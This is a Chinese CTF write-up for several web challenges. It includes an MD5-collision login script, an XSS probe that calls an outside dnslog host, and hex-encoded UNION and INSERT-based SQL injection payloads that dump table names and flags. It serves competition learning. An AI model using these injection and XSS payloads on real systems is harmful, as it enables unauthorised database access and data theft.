web簽到
這道題在一航sniperoj上寫到過,當時就覺得題目挺贊的。解法用到了王小云的md5碰撞的測試樣本。具體內(nèi)容自行百度。直接給出代碼和解法。
題目地址: http://39.107.33.96:10000
#!/usr/bin/env python
import requests
import hashlib
def getMd5(word):
m = hashlib.md5()
m.update(word)
return m.hexdigest()
def getContent(filepath):
with open(filepath, "r") as f:
return f.read()
def login(username, password):
url = "http://39.107.33.96:10000/index.php"
data = {
"param1":username,
"param2":password,
}
proxy={"http":"http://127.0.0.1:8080"}
response = requests.post(url, data=data,proxies=proxy)
print response.text.split("\n")[0]
username = getContent("./evil1.txt")
password = getContent("./evil2.txt")
print "[+] Checking md5 of input files..."
if getMd5(username) == getMd5(password):
print "[+] Checking OK!"
print "[+] Sending..."
login(username, password)
else:
print "[-] Checking failed! Please use : [http://www.win.tue.nl/hashclash/]"
文件下載地址:https://pan.baidu.com/s/1OaS7nnuQzG4dsmneAHEArA#list/path=%2Fctf
Share your mind
題目地址: http://39.107.33.96:20000/login.php
踩了個坑,非預(yù)期無解...
非預(yù)期: 提交http://39.107.33.96:20000/index.php/report?<img src=xxxx.ceye.io>看dnslog發(fā)現(xiàn)確實解析,測試也能夠xss,但是就是打不過cookie......換了一萬年的payload.......也是頭鐵,無語,預(yù)期解也沒想出來....
Three hit
一個注冊登錄功能,在age處注入,age校檢數(shù)字,用十六進制繞過。所以字符先十六進制轉(zhuǎn)化,在insert進數(shù)據(jù)庫的時候又會變回字符串。
payload:
1 and 0 union select 1,2,3,4 #
3120616e64203020756e696f6e2073656c65637420312c322c332c342023
1 and 0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4 #
3120616e64203020756e696f6e2073656c65637420312c2873656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829292c332c342023
1 and 0 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167),3,4 #
1 and 0 union select 1,(select group_concat(flag) from flag),3,4 #
python is best language
題目地址: http://39.107.32.29:20000
寫過django,和flask差不多,拿到源碼往Cobra一丟,以為能有點東西,發(fā)現(xiàn)還是太年輕了...
python代碼審計沒怎么接觸過,依稀記得有jinja模板漏洞之類的。結(jié)構(gòu)比較簡單,一步一步跟進測試分析吧。
注冊頁面
看表單處理,在/app/forms.py,對用戶名注冊有過濾。
def validate_username(self, username):
if re.match("^[a-zA-Z0-9_]+$", username.data) == None:
raise ValidationError('username has invalid charactor!')
user = mysql.One("user", {"username": "'%s'" % username.data}, ["id"])
是一個留言板,還可以看到forms.py下面對profile about me的過濾。
def validate_note(self, note):
if re.match("^[a-zA-Z0-9_\'\(\) \.\_\*\`\-\@\=\+\>\<]*$", note.data) == None:
raise ValidationError("Don't input invalid charactors!")
但是卻對瀏覽這一塊say something沒有任何防護處理。
class PostForm(FlaskForm):
post = StringField('Say something', validators=[DataRequired()])
submit = SubmitField('Submit')
在others.py可以看到與數(shù)據(jù)庫交互的操作,是直接拼接的,不存在防護。
所以注入應(yīng)該是在留言的時候,通過insert將我們需要注入的數(shù)據(jù)存起來。
接下來就是搞清instert結(jié)構(gòu),在models.py最下面。
class Post(Base):
__tablename__ = "post"
id = Column(Integer, primary_key=True)
body = Column(String(140))
user_id = Column(Integer, ForeignKey('user.id'))
timestamp = Column(Date, index=True, default=datetime.utcnow)
def __repr__(self):
return '<Post {}>'.format(self.body)
可以看到,插入數(shù)據(jù)有四條。
所以payload t',1,'2018-03-24')#即可成功閉合。
同時再插入一條獲取我們的數(shù)據(jù)。
go',1,'2018-03-24'),(111,(select group_concat(table_name) from information_schema.tables where table_schema=database()),'1','2018-03-24')#
得到:flaaaaag,followers,post,user
go',1,'2018-03-24'),(1111,(select group_concat(column_name) from information_schema.columns where table_name=0x666c616161616167),'1','2018-03-24')#
得到flllllag
go',1,'2018-03-24'),(11111,(select group_concat(flllllag) from flaaaaag),'1','2018-03-24')#
QWB{us1ng_val1dator_caut1ous}
打不動真的打不動........
